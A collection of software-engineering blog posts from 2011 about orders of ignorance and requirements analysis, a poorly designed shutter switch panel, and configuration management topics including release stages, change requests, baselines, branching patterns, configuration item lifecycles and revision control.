Zero Order Ignorance is knowledge; something we know and can articulate (in software)

First Order Ignorance is something we don’t know; a question we need an answer to.

Second Order Ignorance is the things we don’t know we don’t know.  That is, we don’t even know what questions to ask.

Third Order Ignorance is lack of methodology – we don’t have techniques, tools or processes that can identify and illuminate our lack of knowledge.

Fourth Order Ignorance means we don’t even know there are orders of ignorance!

(In many ways Armour’s work is a far more cohesive version of Donald Rumsfeld’s infamous “Known Knowns” speech.)

Armour’s paper crystallised a couple of very important points to me:

Why requirements analysis is so vital.

For nearly the last decade I have been promoting the importance of requirements analysis as a key part of development.  If we understand the problem we are meant to solve – completely and with precision – developing a solution in software is relatively straightforward. 

It’s heartening that most engineers are actually pretty good at developing solutions. But they’re not really very good at understanding problems. When people call me in to help with ‘design issues’ it’s most commonly the case they don’t actually understand their problem properly. Usually, I help their ‘design’ skills by doing detailed requirements analysis with them!

I have found the teams that spend most time performing requirements analysis spend the least time designing and debugging and have the most comprehensive and maintainable solutions.  This is because their software captures the system knowledge efficiently and their code isn’t riddled with what Armour calls ‘unknowledge’ – irrelevant, or incorrect knowledge about the system captured as code (you know, the stuff that leads to ‘features’!)

What process is all about.

Processes are a technique to give you questions, not answers. I think this upsets many developers (and their managers).  Many people want handle-turning solutions: Feed in some customer requirements, crank the handle, and out comes lovely, pristine software. 

Unfortunately, the world doesn’t work like that.  If it did, we’d all be replaced by machines (that’s been threatened since the Sixties and it hasn’t happened yet. I’m not holding my breath, either.) 

Every software problem is unique and full of those delicious little subtleties that make our jobs as embedded developers so interesting (and yes, you can take ‘interesting’ in the sense of the old Chinese curse!) There is simply no way you can mechanise the behaviours needed to elicit, understand and formalise all the knowledge required to develop a typical embedded system.

Most approaches to software process description assume software development is a (linear) mechanical process; and the (procedural) transformation of input artefact to output artefact will (somehow) produce working software.  Whilst this approach works for other manufacturing processes it cannot deal with the simple fact that software development is about knowledge capture and, well, we often don’t know what we don’t know!

The best processes are those that consist of a set of goals and a corresponding set of methodologies.  The goals effectively give you an appropriate set of questions that must be answered before you can continue; the answers to those questions will yield pertinent information about the system. 

One could argue the artefacts are supposed to embody the appropriate design questions but engineers are notorious for simply filling in the blanks with banal waffle just so they can move on to the interesting stuff – that is, hacking code (and learning about the system!)

More appalling user interface design

December 16th, 2011

I came across a wonderfully counter-intuitive piece of user interface design this week.

The room I was in had a sliding shutter (that, for reasons best known to the architects, opened into the main building and not outside).  The two halves of the shutter are controlled independently – that is, you can close one side or the other, or both.  Each shutter is controlled with independent switch panels.

Common sense would suggest a single rocker switch: pushing one side would close the shutter; pushing the other would open it.  The designers, however, had other ideas and selected the implementation below:

Annotated interface

 

Each shutter has a pair of single-action switches – one to close the shutter (the one at the top) and one to open the shutter.

Pressing the top switch (on its right hand side) closes the shutter – as expected.

Pressing the bottom switch on its left hand side (the intuitive action) does nothing.  In fact, you have to press the bottom switch on its right hand side to get it to do anything.

Even better, the switch panel for the right shutter is an exact copy of the left; so the controls are completely opposite – the top switch opens the shutter, the bottom switch closes it!

As they say:  good design is like oxygen – you don’t notice it until it’s not there.

Releasing Code

June 20th, 2011

The Release process

The Release process defines the actions required to deliver a software product to an external customer. The external customer is any entity outside the development department. This may be a true (paying) customer, or may be another engineering department, for example Testing or Production.

The Release process is a triggered activity. The trigger events are scheduled as part of project planning. Defining a release is a project milestone which must define

  • What will be released
  • When it will be released
  • Who it will be released to

 

Release process relationships

The Release process is related to, but independent of, the Change Management, Revision Control and Build Processes.

 

image

Figure 21 – Release management is related to, but independent of, the other CM practices

Change Management

Defines the modifications and/or additions to the product, and the order in which the changes are incorporated.

Revision Control

Ensures the configuration of the product is controlled and reproducible.

Build Process

Defines how to build the product.

Release Process

Defines the target recipient of the product.

 

Software release stages

During development the product may be released:

  • To different standards
  • To different customers

The different releases comprise a release lifecycle, with each stage representing an improvement in product quality (Figure 22).

 

image

Figure 22 – Each release type represents a different level of quality, and may be released to different customers
 
Development releases

Development releases are internal releases; usually to (independent) test. These releases are unlikely to be ‘feature-complete’; often the release represents one or more work packages (or, in the case of Agile projects, features or ‘sprints’).

It is not expected that these early releases are perfect. It is likely they have only undergone developer testing. A significant number of bugs can be expected in early releases.

Development releases may be produced at high frequency. Weekly releases would be expected at the beginning of development, possibly rising to daily as the project enters a debug phase.

Alpha and Beta

Alpha and Beta releases focus on usage and/or usability testing. Sometimes these are known as Technical Preview releases. The product may be feature-complete (or close) at this stage. Alpha/Beta releases are relatively stable and should contain no (known) critical bugs.

Alpha testing consists of simulated or actual operational testing. It is normally carried out in-house and performed by non-development users, for example internal proxy-customers (staff acting on behalf of the ‘real’ customers).

Beta testing is also operational testing. It is often performed out-house (that is, outside the control of the development organisation). It is carried out by focus groups, or specially selected users. Very often Beta releases are made available free to existing customers to use and test in their own environment.

It is important not to begin Alpha and Beta releases too early in the development cycle. Although allowing users to test the product is potentially very effective, a product with many bugs (particularly in areas of key user functionality) can lead to a loss of confidence in the product that is very difficult to recover.

Production-ready releases

The term Release Candidate refers to a version with the potential to be a final product. It is essentially ready to release unless fatal bugs emerge during final testing (or possibly Alpha or Beta testing). The product features all designed functions and has no known critical bugs.

A Production release is very similar to a Release Candidate (in fact, it could be argued the Production release is just the final release candidate!). Any last-minute bugs have been fixed. The Production release represents final product quality and features, and is the release sent to Production engineering.
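
As a rough illustration, the release stages described above can be written down as an ordered enumeration. This is only a sketch in Python: the names `ReleaseStage`, `known_critical_bugs_allowed` and `next_stage` are made up for the example, and the strict ordering (including Alpha before Beta) is my assumption about what Figure 22 shows.

```python
from enum import IntEnum


class ReleaseStage(IntEnum):
    """Release stages in (assumed) increasing order of product quality."""
    DEVELOPMENT = 1
    ALPHA = 2
    BETA = 3
    RELEASE_CANDIDATE = 4
    PRODUCTION = 5


def known_critical_bugs_allowed(stage):
    """Assumption: only Development releases may contain known critical bugs."""
    return stage < ReleaseStage.ALPHA


def next_stage(stage):
    """Return the following stage; Production is the end of the lifecycle."""
    if stage is ReleaseStage.PRODUCTION:
        return stage
    return ReleaseStage(stage + 1)
```

A release plan could then check, for example, that a build with an open critical bug is never promoted beyond `ReleaseStage.DEVELOPMENT`.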

Change Management

June 13th, 2011

Change Management is concerned with the proposal, selection and scheduling of changes during the lifecycle of a project.

Change Management is interlinked with, but separate to, Revision Control.

Change Management is the core to controlling your development processes. Without effective Change Management the management of your project is subject to slavish adherence to a (fixed, and pre-determined) project plan, with no mechanism for dealing with inevitable changes in requirements, design, implementation or testing.

It is no surprise that Change Management is at the heart of so many Agile processes, such as SCRUM.

Change Request

The core of Change Management is the Change Request (often abbreviated simply as CR). A Change Request has many different names, all meaning the same thing:

  • Change Note (CN)
  • Engineering Change (Order)
  • Engineering Change Request (ECR)
  • Action Request (AR)
  • Request For Change (RFC)

Essentially, a Change Request is a call for an adjustment to a system. Change requests typically originate from one of five sources (Dennis, Wixom, & Tegarden, 2002):

  • Bugs that must be fixed
  • System enhancement requests from users
  • Events in the development of other systems
  • Changes in underlying structure and/or standards
  • Demands from senior management

 

The CR Artefact

A CR is a project artefact – that is, it is an entity that is created, worked on, stored and audited, just like every other artefact in the system. The CR represents the lifecycle of a change. As such it has a different lifecycle to other artefacts.

As an artefact the CR may (in fact, should) also be held under revision control.

The CR lifecycle is shown in Figure 19. There are three main parts to the lifecycle.

 

image

Figure 19 – The Change Request is an artefact with its own unique lifecycle

 
Opening the CR

Creating a CR records that some change to the system is requested; it does not imply that the work will be performed. Once created the change must be reviewed before it can be worked on. The review is performed by the Change Control Board (CCB). The CCB consists of stakeholders who will be affected by the change, and those who can decide whether the change is worth doing. At the minimum this will be the Project Manager or Team Leader; but may include a multi-disciplinary group including engineering, senior management, marketing, customer support, etc.

The CR must be assessed for impact to the project. This work should ideally be done by the CR submitter. Points considered during the assessment of a change request include:

  • Technical feasibility
  • Timescales
  • Customer expectation
  • Resource
  • Quality
  • etc.

The CR may be Accepted (Opened for working), Rejected (Infeasible or invalid) or Deferred (delayed; therefore inducing technical debt to the project).

Open CRs

Once the CR is opened, project artefacts can be modified. Each artefact follows its own Configuration Item lifecycle (Figure 20). The CR records the artefacts modified. Each artefact records the changes made in support of the CR.

 

image

Figure 20 – Each artefact modified under the Change Request follows its own change lifecycle
 
Including the change

The completed change should be reviewed again by the CCB. The purpose of the review is to assess whether the change is valid – that is, do the modifications made to the system correctly address the change requested? An invalid change will be rejected for rework.

Once accepted the change can be integrated into the product.
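
The three parts of the CR lifecycle (opening, working, including) can be sketched as a small state machine. This is a minimal Python sketch, not a reproduction of Figure 19: the state names, the `ChangeRequest` class and, in particular, the transitions out of `DEFERRED` are assumptions made for illustration.

```python
from enum import Enum, auto


class CRState(Enum):
    SUBMITTED = auto()   # created, awaiting CCB review
    OPEN = auto()        # accepted by the CCB; work may proceed
    REJECTED = auto()    # infeasible or invalid
    DEFERRED = auto()    # delayed
    COMPLETED = auto()   # work done, awaiting the second CCB review
    INTEGRATED = auto()  # change accepted into the product


# Allowed transitions as read from the text (DEFERRED exits are assumed).
TRANSITIONS = {
    CRState.SUBMITTED: {CRState.OPEN, CRState.REJECTED, CRState.DEFERRED},
    CRState.DEFERRED: {CRState.OPEN, CRState.REJECTED},
    CRState.OPEN: {CRState.COMPLETED},
    CRState.COMPLETED: {CRState.INTEGRATED, CRState.OPEN},  # OPEN = rework
    CRState.REJECTED: set(),
    CRState.INTEGRATED: set(),
}


class ChangeRequest:
    def __init__(self, title):
        self.title = title
        self.state = CRState.SUBMITTED
        self.modified_artefacts = []  # the CR records the artefacts it touched

    def move_to(self, new_state):
        if new_state not in TRANSITIONS[self.state]:
            raise ValueError(f"{self.state.name} -> {new_state.name} not allowed")
        self.state = new_state

    def record_artefact(self, artefact_id):
        if self.state is not CRState.OPEN:
            raise ValueError("artefacts may only be modified under an open CR")
        self.modified_artefacts.append(artefact_id)
```

The useful property is that an artefact cannot be recorded against a CR the CCB has not accepted, and a completed change can only reach the product through the second review.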

 

Change Management is often overlooked in CM. Change Management controls precisely what is going to change in the project and when. Without Change Management a project is running on ad hoc and unrecorded decisions by the development team or project manager and runs a serious risk of heading out of control.  Although the Change Management presented here involves project artefacts (CRs) many Agile processes adopt similar principles using techniques such as Product Backlogs and Feature Lists (SCRUM), which are organised by customer priority. These mechanisms are, in effect, simple Change Management processes.

Baselines and Branching

June 6th, 2011

A baseline is an identified set of files and directories in which there is one and only one version of each file and directory.

A baseline identifies one particular configuration of the software (or a subset thereof).

The baseline represents a fixed point in the development that may be recreated as required.

Specifying a Baseline

A baseline defines a set of files, each at a particular version. These need not be the latest (most recent) version. A baseline label uniquely identifies the configuration. Files may belong to one or more baselines.

image

Figure 12 – A baseline defines a set of files, each at a particular version.

 

In the example of Figure 12 baseline BL1.0 is the first baseline recorded. It consists of seven artefacts, each at a unique revision number. For this example, assume that BL1.0 records the most recent versions of each artefact. As development progresses each artefact is modified as required (that is, some artefacts are modified, some are not). At some time later another baseline is taken – BL2.0. In this case BL2.0 records the current latest revisions of each file. Notice that artefact F is unchanged, so F v1.0 is included in both baseline BL1.0 and BL2.0.

In general each successive baseline contains more recent versions of files (but not always).
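
In data terms a baseline is little more than a labelled mapping from artefact to version. The Python sketch below shows the idea with three artefacts rather than the seven in Figure 12; apart from F v1.0, the version numbers and the helper names are invented for illustration.

```python
# Each baseline maps an artefact name to exactly one version.
# Only "F at v1.0 in both baselines" comes from the text; the rest is made up.
BL1_0 = {"A": "1.2", "B": "1.0", "F": "1.0"}
BL2_0 = {"A": "1.4", "B": "1.1", "F": "1.0"}


def unchanged_between(older, newer):
    """Return artefacts recorded at the same version in both baselines."""
    return sorted(name for name, ver in older.items() if newer.get(name) == ver)


def changed_between(older, newer):
    """Return {artefact: (old_version, new_version)} for artefacts that differ."""
    return {
        name: (older.get(name), newer.get(name))
        for name in sorted(set(older) | set(newer))
        if older.get(name) != newer.get(name)
    }
```

Comparing two baselines this way gives a quick audit of what moved between two fixed points in the project.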

When to use baselines

Baselines are a key tool in managing and auditing the state of a project. Baselines should be created prior to any significant project activity:

Development

Baselines provide a ‘working’ point in the project’s configuration. Recording a baseline prior to making a major change to the system allows the development to start from a known working point and, in the event of something going wrong, to ‘roll-back’ to that working configuration.

Baselines should be made prior to starting any new package of work (as evidence of project progress); prior to any new feature development; prior to changing or upgrading any tools; etc.

Release

A baseline records the complete configuration of the product that is being distributed from the development department (whether that is to an external customer or just to the test department).

Audit

Baselines provide process evidence for audits and also time-stamped evidence of the project’s progress (for example, starting a particular work package).

 

Baseline of baselines

In larger, more complex systems, we may choose to manage the system complexity using a ‘Components’ approach. Each ‘component’ represents some aspect of system functionality – for example a subsystem. Using this approach each component of the system has its own (unique) baselines, independent of any other component (Figure 13).

image

Figure 13 – each component of the system has its own unique set of baselines

Note, not shown in this example is the fact that components may share artefacts. For example, both component A and component B may share a common artefact H; with each component using a different revision.

image

Figure 14 – A complete system constructed from a  ‘baseline of baselines’

The (complete) product’s baselines are constructed from (unique) combinations of the component’s baselines (Figure 14). This method is known as a ‘Baseline of baselines.’
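
A ‘baseline of baselines’ can be pictured as a second level of mapping: the product baseline picks one baseline per component, and each component baseline picks one version per artefact. The following Python sketch assumes hypothetical labels (`A_BL1.0`, `SYS_BL2.0`, etc.) and invented version numbers; note how the shared artefact H appears at a different revision in each component.

```python
# Component baselines: component -> label -> {artefact: version}. Values invented.
COMPONENT_BASELINES = {
    "A": {
        "A_BL1.0": {"G": "1.0", "H": "1.1"},
        "A_BL2.0": {"G": "1.3", "H": "1.1"},
    },
    "B": {
        "B_BL1.0": {"H": "1.4", "J": "1.0"},
    },
}

# A product baseline selects exactly one baseline for each component.
PRODUCT_BASELINES = {
    "SYS_BL1.0": {"A": "A_BL1.0", "B": "B_BL1.0"},
    "SYS_BL2.0": {"A": "A_BL2.0", "B": "B_BL1.0"},
}


def resolve(product_label):
    """Expand a product baseline into {(component, artefact): version}."""
    resolved = {}
    for component, label in PRODUCT_BASELINES[product_label].items():
        for artefact, version in COMPONENT_BASELINES[component][label].items():
            resolved[(component, artefact)] = version
    return resolved
```

Resolving `SYS_BL2.0` picks up the newer baseline of component A while leaving component B exactly where it was.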

 

Branch Patterns

Branching is the (apparent) duplication of an artefact, or set of artefacts, so that they can be developed independently of the main development activity. Branching is a facility of all revision control systems. RCSs incorporate mechanisms (such as lazy copying) to avoid the potentially massive overhead of copying artefacts between branches. Branches allow parallel development, which is essential in all but the most simple of software developments.

Conceptually, the artefacts that make up a product or system form the main branch or trunk of the development. The trunk represents the main line of development for the product. Ideally, the trunk represents the most recent (working) configuration of the project. Branches represent alternative paths of development. Motivations for branching include:

  • Maintenance of released products
  • Customer specific additions or modifications
  • New development work
  • Research and development projects

Note, with branching the unique identifier of an artefact must be extended to include the artefact’s branch. Thus artefact MyDoc v1.0 will be extended to be (something like) \main\MyDoc v1.0, which will be different to \main\branch1\MyDoc v1.0. In this case \main identifies the trunk branch and \main\branch1 identifies the first branch from the trunk branch.
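
To make the extended identifier concrete, here is a minimal Python sketch. The `ArtefactId` class is hypothetical, and the backslash-separated format simply mimics the ‘something like’ notation used above; real tools each have their own syntax.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ArtefactId:
    branch: str    # e.g. r"\main" or r"\main\branch1"
    name: str      # human-readable artefact name
    revision: str  # revision identifier within that branch

    def __str__(self):
        # Branch path, then name, then revision, in the notation used above.
        return f"{self.branch}\\{self.name} v{self.revision}"


trunk_doc = ArtefactId(r"\main", "MyDoc", "1.0")
branch_doc = ArtefactId(r"\main\branch1", "MyDoc", "1.0")
```

Although both objects carry the same name and revision, they compare as different artefacts because the branch is part of the identity.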

Uncontrolled branching can lead to major administrative issues (many companies have an RCS administrator simply to keep the repository ‘healthy’).

The branching patterns presented below are a systematic approach to version tree usage. They are designed to reduce the complexity of repository branch management and allow effective project management.

 

Sequential

The Sequential branching pattern (Figure 15) is the simplest model – in that it contains no branching! In essence, it is a ‘pseudo-branching’ pattern.

All development is performed on the trunk branch. All development is linear; no parallel development can be supported. This pattern requires, and enforces, mutually exclusive changes to artefacts. By default, this is the pattern followed by all artefacts.

 

image

Figure 15 – The ‘pseudo-branching’ pattern, Sequential.  There is no branching!

The Sequential pattern is fine for projects where there is no parallel development required and the current release always has the most up-to-date developments. In general, this restricts the pattern’s use to simpler projects.

 

Off-Shoot

The Off-Shoot branching pattern allows a legacy version (the mainline development) to have derivative and independent versions created.

 

image

Figure 16 – The off-shoot branching pattern

The off-shoot branch can be created retrospectively – that is, development on the trunk branch could be well advanced before the off-shoot branch is created. The off-shoot is never merged into another branch. Off-shoots may also have their own off-shoots.

Note that the main trunk is baselined before the offshoot is created.

 

Loop

The Loop branch pattern is a variation on the Off-Shoot pattern. The Loop pattern allows basic managed development.

 

image

Figure 17 – The Loop branching pattern

In this example the trunk branch represents the release branch. That is, all releases are from the main branch. New development is performed in an Off-Shoot branch (called \Dev BL 2.0 in the example since it represents the new code that will appear in baseline 2.0 of the product). The new development work is independent of any release code.

Once development has been completed in the Off-Shoot branch the Loop is closed by merging the off-shoot back into its parent branch. Note that baselines in the main branch only represent completed development activities.

 

Integration

The Integration pattern extends the Loop pattern model to allow managed and concurrent development.

 

image

Figure 18 – the Integration branching pattern

As above, the main trunk branch represents the release branch for the code; no development is performed on the main branch.

For a new feature a new branch is created (\Integration). The new development consists of three work packages. In this example Work Package 1 (\WBS1) must be completed before Work Package 3 (\WBS3) can be started.

Within the \Integration branch two new Loops are started (\WBS1 and \WBS2). The work on both packages continues independently and in parallel. When Work Package 1 is complete it is merged into the \Integration branch. At this point Work Package 3 can be started, so a new branch is created from the \Integration branch (after baselining the \Integration branch – not shown). Some time later Work Package 2 is completed and merged into the \Integration branch. Finally Work Package 3 is complete and merged. To complete development the \Integration branch is merged back into the mainline development.

The Integration pattern builds on the smaller patterns to form a comprehensive branch/merge strategy. The strength of this pattern is that the RCS archive reflects the development project plan.
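
The sequence of branches and merges in the Integration example can be replayed with a toy model. This Python sketch is purely illustrative: the `Branch` class is hypothetical, a ‘change’ is just a string, and a merge is modelled as appending any changes the parent does not yet have (no conflict handling at all).

```python
class Branch:
    def __init__(self, name, parent=None):
        self.name = name
        self.parent = parent
        # A new branch starts with whatever its parent contains at that moment.
        self.changes = list(parent.changes) if parent else []

    def commit(self, change):
        self.changes.append(change)

    def merge_into_parent(self):
        # Toy merge: copy across any change the parent has not seen yet.
        for change in self.changes:
            if change not in self.parent.changes:
                self.parent.changes.append(change)


main = Branch("\\main")
integration = Branch("\\Integration", main)

wbs1 = Branch("\\WBS1", integration)  # Work Packages 1 and 2 run in parallel
wbs2 = Branch("\\WBS2", integration)
wbs1.commit("WP1")
wbs2.commit("WP2")

wbs1.merge_into_parent()              # WP1 done: close its Loop
wbs3 = Branch("\\WBS3", integration)  # WP3 may only start after WP1 is merged
wbs3_starting_point = list(wbs3.changes)
wbs3.commit("WP3")

wbs2.merge_into_parent()
wbs3.merge_into_parent()
integration.merge_into_parent()       # finally, back to the release branch
```

Because \WBS3 is branched only after \WBS1 has been merged, it starts with Work Package 1 already in place, which is exactly the dependency the project plan demanded.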

Configuration Items

May 30th, 2011

A Configuration Item (sometimes referred to as a Computer System Configuration Item, or CSCI) is an artefact (hardware and/or software) that has an end-user purpose – that is, it contributes, in some way, towards the attributes of a system or product, or the development processes followed to produce the system or product. A Configuration Item (CI) is an artefact that is treated as a self-contained unit for the purposes of identification and change control. For example:

  • Specifications
  • Design models
  • Source code
  • Make files
  • etc.

Configuration Item identification

Configuration identification is the process of identifying the attributes and procedures that define every aspect of a configuration item.

Configuration identification performs three distinct roles:

Uniquely identifying each Configuration Item.

CIs are the artefacts to be controlled under Configuration Management. Each CI must be uniquely identified by name, version (revision) and location (on the file system).

Establishing a change policy

The CI’s change policy defines how the artefact is revision controlled; and whether that control changes during the lifetime of the project.

Establishing a review policy

Ideally, every artefact should be reviewed. Configuration identification establishes how the artefact will be reviewed and when it will be reviewed.

Configuration Identification must be performed prior to establishing any revision control system. All CI attributes and policies must be recorded in the project’s CM plan.
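
One way to record the outcome of configuration identification is as a simple record per CI. The Python sketch below is an assumption about how such a record might look; the field names, the policy labels and the example entries are all invented, and a real CM plan would hold far more detail.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ConfigurationItem:
    name: str           # human-readable artefact name
    revision: str       # version (revision) identifier
    location: str       # where the artefact lives on the file system
    change_policy: str  # how the artefact is revision controlled (a label here)
    review_policy: str  # how and when the artefact is reviewed

    @property
    def identity(self):
        """A CI is uniquely identified by location, name and revision."""
        return (self.location, self.name, self.revision)


def duplicate_identities(items):
    """Return identities that appear more than once in a CM plan."""
    seen, duplicates = set(), set()
    for item in items:
        if item.identity in seen:
            duplicates.add(item.identity)
        seen.add(item.identity)
    return duplicates


cm_plan = [
    ConfigurationItem("ReqSpec", "1.0", "/docs", "reviewed", "formal review"),
    ConfigurationItem("main.c", "1.3", "/src", "software", "peer review"),
    ConfigurationItem("main.c", "1.3", "/src", "basic", "none"),  # clash
]
```

Running `duplicate_identities(cm_plan)` flags the second `main.c` entry, since two records claim the same name, revision and location.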

Configuration lifecycles

Configuration lifecycles define how an artefact is checked into and out of the revision control system. The configuration lifecycle defines the ‘life’ of one particular change, as it applies to that artefact (cf. Change Management, below). The lifecycle is typically shown as a state transition diagram.

For any real project of any complexity a number of lifecycles will be required. Also note, an artefact’s lifecycle may change through the lifetime of the project. This is defined by the artefact’s change policy.

Listed below are a number of common configuration lifecycles.

‘Archive’ lifecycle

Archive artefacts are configuration items that are simply stored in the CM system. Archive artefacts are never modified once they exist. For example, the binary (download) file for a particular release.

 

image

Figure 8 – The Archive lifecycle
 
‘Basic CI’ lifecycle

The ‘Basic’ CI lifecycle (Figure 9) is for artefacts that must be archived and may be modified over time. For example, the Compiler used on the project may be updated over the course of the project’s lifetime.

image

Figure 9 – the Basic lifecycle

In addition, this lifecycle is used for artefacts that have not yet been released (see Release Management, below). Such items should be stored in the project’s RCS repository (for completeness) and should have their modification history recorded but these items do not need to be subject to stringent review or quality checks before being checked in.

‘Reviewed CI’ lifecycle

A ‘Reviewed’ Configuration Item must pass a review (peer or formal) before it can be checked back in (Figure 10). For example, a Requirements Specification.

This lifecycle is sometimes known as a Document lifecycle.

image

Figure 10 – The Reviewed CI (or Document) lifecycle

Any artefact that has been released from development, or originates from outside the development department should be subject to this lifecycle.

‘Software CI’ lifecycle

The Software CI lifecycle (Figure 11) is an extension to the ‘Reviewed CI’ lifecycle (above). In addition to being reviewed, a software CI should also pass Static Analysis testing; and pass Unit (component) tests; before being checked in.

 

image

Figure 11 – The software item lifecycle.

The Software CI lifecycle can be implemented in environments that demand very high software quality, for example safety-critical applications.
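
The four lifecycles differ mainly in what must be true before a modified artefact can be checked back in. A minimal Python sketch of that gate follows; the function name, the string labels and the boolean flags are assumptions for illustration, not features of any particular RCS.

```python
def can_check_in(lifecycle, reviewed=False, static_analysis_ok=False,
                 unit_tests_ok=False):
    """Decide whether a modified artefact may be checked back in."""
    if lifecycle == "archive":
        return False  # archive artefacts are never modified once they exist
    if lifecycle == "basic":
        return True   # history is recorded, but no review is demanded
    if lifecycle == "reviewed":
        return reviewed
    if lifecycle == "software":
        # Reviewed CI conditions plus static analysis and unit tests
        return reviewed and static_analysis_ok and unit_tests_ok
    raise ValueError(f"unknown lifecycle: {lifecycle}")
```

For example, `can_check_in("software", reviewed=True, static_analysis_ok=True)` is refused because the unit tests have not passed.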

 

To get the most out of your Revision Control System each project artefact must be defined, with its usage, review policy and, perhaps most importantly, its change policy. This information gives the developer the information needed when an artefact has to change – what is required and who must be involved. Having effective configuration identification in place also ensures that the project’s artefacts retain their quality (at whatever level that quality is set).

Revision Control

May 23rd, 2011

What is Revision Control?

Revision control is the management of multiple revisions of the same unit of information. The focus is on controlling access to the artefact; and recording the history of changes.

Revision Control is variously known as version control, source control, source code management and several other titles.

Revision control has its roots in the management of engineering blueprints and paper documents. Today, any practical application of Revision Control requires the use of specialist software tools.

Artefact Identification

The core to revision control is the artefact. An artefact is a unique unit of information that may change over time (or not – some artefacts are deliberately unchanging – see below). Every revision-controlled artefact is identified by a unique name made up of:

Artefact Name

The artefact’s name represents a human-readable identifier. This is typically how the artefact is referred to during the development process. The Artefact’s name is constant – that is, it does not change.

Revision identifier

The revision identifier is used to track the history of the information. It is usually a number (e.g. 1.1); the highest number is the most recent version (revision).

image

Figure 1 – The artefact identifier reflects the name of the unit of information and its history

As the artefact is modified (revised) the revision identifier is incremented and a new entity is created (see Figure 1). Thus, artefact MyDoc v1.0 is a different entity to MyDoc v1.1 since it contains different contents. One of the principles of revision control is that this process is hidden from the user, and they only see the most recent version, unless they explicitly choose to access the artefact’s history (by accessing a previous revision).

Problems with ‘file system’ Revision Control

The simplest form of revision control is to use the directory system on your computer. Each revision of a product is kept as a separate directory on the disk (Figure 2). This is a simple technique but is rarely very effective.

image

Figure 2 – Storing file revisions using a file system is rarely effective

Since few file systems have a history facility built in, each revision must result in the storage of multiple (complete) copies of each artefact.

Normally, using a file system as a repository implies using a networked file server. Most modern file systems will recognise that a file is open for editing and restrict access (see File Locking, below). However, to improve responsiveness most users will make a local copy of their ‘working files’. This can lead to a problem known as ‘Latest-write wins’: if multiple developers copy the same file, modify it (usually in different ways) and then each copy their modified file back to the server, any previous changes are lost and only the last developer to save has their revisions included. Clearly, controlling access to each file requires careful management to ensure consistency. Such systems, which rely on process and procedure to retain consistency, are easy to abuse, particularly in the heat of the rush to delivery.
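
The ‘Latest-write wins’ problem is easy to reproduce. In this small Python sketch a dictionary stands in for the file server; the file name, its contents and the two developers are invented for the example.

```python
# A dictionary stands in for the shared file server.
server = {"config.txt": "timeout=10\nretries=3\n"}

# Two developers each take a local working copy of the same file.
alice_copy = server["config.txt"]
bob_copy = server["config.txt"]

# Each makes a different (and perfectly reasonable) change.
alice_copy = alice_copy.replace("timeout=10", "timeout=30")
bob_copy = bob_copy.replace("retries=3", "retries=5")

# Both copy their file back; whoever saves last silently wins.
server["config.txt"] = alice_copy
server["config.txt"] = bob_copy
```

After the second write the server holds Bob’s `retries=5` but the timeout is back at 10; Alice’s change has gone and nothing recorded that it ever existed.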

Another problem comes when artefacts are shared between systems; especially if each product will make different demands, and require different modifications, to the artefact.

Using your file system for source control is, at best, adequate for one-man projects.

Revision Control Systems

For anything more than trivial revision control (for example, with more than one developer) a Revision Control System (RCS) is required.

A Revision Control System (also known as a Version Control System – VCS) is a piece of software that acts as an archive for artefacts. The RCS stores the latest version of the artefact and all revisions. The developer can take the latest revision (often called the ‘tip’) or any named revision.

Typically, the RCS stores the first version of the artefact, plus the changes between one revision and the next (known as ‘deltas’). Artefact version numbering is usually automatically performed by the tool.
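
To show what ‘first version plus deltas’ means in practice, here is a toy store in Python. It uses the standard library’s `difflib.SequenceMatcher` to work out each delta; the `DeltaStore` class and the delta format are invented for this sketch, and real tools use their own (often more sophisticated) schemes.

```python
from difflib import SequenceMatcher


def make_delta(old, new):
    """Describe how to turn line list `old` into `new`, storing only new lines."""
    delta = []
    for tag, i1, i2, j1, j2 in SequenceMatcher(a=old, b=new).get_opcodes():
        if tag == "equal":
            delta.append(("copy", i1, i2))        # reuse old[i1:i2]
        else:
            delta.append(("insert", new[j1:j2]))  # empty list for a pure delete
    return delta


def apply_delta(old, delta):
    """Rebuild the newer revision from the older one and its delta."""
    new = []
    for op in delta:
        if op[0] == "copy":
            new.extend(old[op[1]:op[2]])
        else:
            new.extend(op[1])
    return new


class DeltaStore:
    """Keeps the first version in full and every later revision as a delta."""

    def __init__(self, first_version):
        self.first = list(first_version)
        self.deltas = []

    def check_in(self, new_version):
        self.deltas.append(make_delta(self.tip(), list(new_version)))

    def revision(self, index):
        """Rebuild revision `index` (0 is the first version) by replaying deltas."""
        lines = self.first
        for delta in self.deltas[:index]:
            lines = apply_delta(lines, delta)
        return list(lines)

    def tip(self):
        return self.revision(len(self.deltas))
```

Any named revision can be recovered by replaying deltas from the first version, at the cost of more work the further the revision is from the start.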

Access control

To ensure integrity of artefact revisions access control is required. Typically this involves locking the file against changes.

Acquiring the lock is referred to as Checking Out.

Committing the change (releasing the lock) is referred to as Checking In.

There are two common methods for achieving access control: File locking and Revision Merging.

File locking

In a file locking system only one developer has write access to the artefact (Figure 4). Other developers will have read-only access to the current (stored) version. The file is only available again once it is checked back in.

image

Figure 4 – File locking allows only one developer at a time to modify an artefact.

File locking avoids complex merges due to large-scale changes since only one developer has access to the file and the ‘merges’ are essentially the new changes made by the developer.

Because a file may be checked out for a significant time developers may be tempted to simply circumvent the system.
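
The check-out/check-in behaviour of a file locking system can be sketched in a few lines of Python. The `LockingRepository` class and its method names are hypothetical; the point is only that a second developer is refused write access until the lock is released.

```python
class LockingRepository:
    def __init__(self):
        self._contents = {}  # artefact name -> latest stored contents
        self._locks = {}     # artefact name -> developer holding the lock

    def add(self, name, contents):
        self._contents[name] = contents

    def read(self, name):
        """Anyone may read the current (stored) version."""
        return self._contents[name]

    def check_out(self, name, developer):
        """Acquire the lock; fail if another developer already holds it."""
        holder = self._locks.get(name)
        if holder is not None and holder != developer:
            raise PermissionError(f"{name} is checked out by {holder}")
        self._locks[name] = developer
        return self._contents[name]

    def check_in(self, name, developer, contents):
        """Commit the change and release the lock."""
        if self._locks.get(name) != developer:
            raise PermissionError(f"{developer} has not checked out {name}")
        self._contents[name] = contents
        del self._locks[name]
```

While Alice holds the lock, Bob can still call `read()` but his `check_out()` raises `PermissionError`, which is precisely the wait that tempts people to work around the system.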

Revision Merging

Most systems allow multiple check-outs of the same file (see Figure 5).

If the file is checked-out multiple times the first developer to check-in always succeeds.

image

Figure 5 – Revision merging allows multiple check-outs on an object

Subsequent check-ins must merge their changes into the current revision. For simple merges this may be performed automatically by the RCS software. More complex merges may (and typically do) require human intervention.
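
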